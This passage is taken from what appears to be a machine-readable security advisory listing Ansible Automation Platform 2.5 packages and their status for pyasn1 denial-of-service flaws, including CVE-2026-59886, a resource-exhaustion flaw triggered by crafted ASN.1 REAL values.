"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pyasn1: python-pyasn1: pyasn1: Denial of Service via crafted ASN.1 OBJECT IDENTIFIER"
},
{
"cve": "CVE-2026-59886",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-07-14T17:01:19.689422+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2500041"
}
],
"notes": [
{
"category": "description",
"text": "A remote attacker can exploit this by providing specially crafted BER/CER/DER-encoded ASN.1 data with a large exponent in the REAL value. When the application subsequently prints, logs, compares, or performs arithmetic on the decoded value, this can cause excessive CPU and memory consumption, leading to a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pyasn1: pyasn1: Denial of Service via crafted ASN.1 REAL values",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw in pyasn1, rated as Important, could lead to a denial of service in Red Hat products that process untrusted ASN.1 data. A remote attacker could send a specially crafted BER, CER, or DER encoded REAL value with a large exponent, causing applications to consume excessive resources during decoding operations such as printing, logging, or arithmetic, thereby rendering the service unavailable.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src"
],
"known_not_affected": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
